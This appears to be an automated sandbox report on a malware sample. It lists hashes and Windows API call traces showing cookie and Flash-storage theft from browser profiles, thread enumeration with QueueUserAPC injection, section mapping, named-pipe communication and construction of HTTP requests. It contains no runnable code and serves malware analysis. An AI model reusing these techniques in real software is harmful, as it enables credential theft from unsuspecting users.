  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
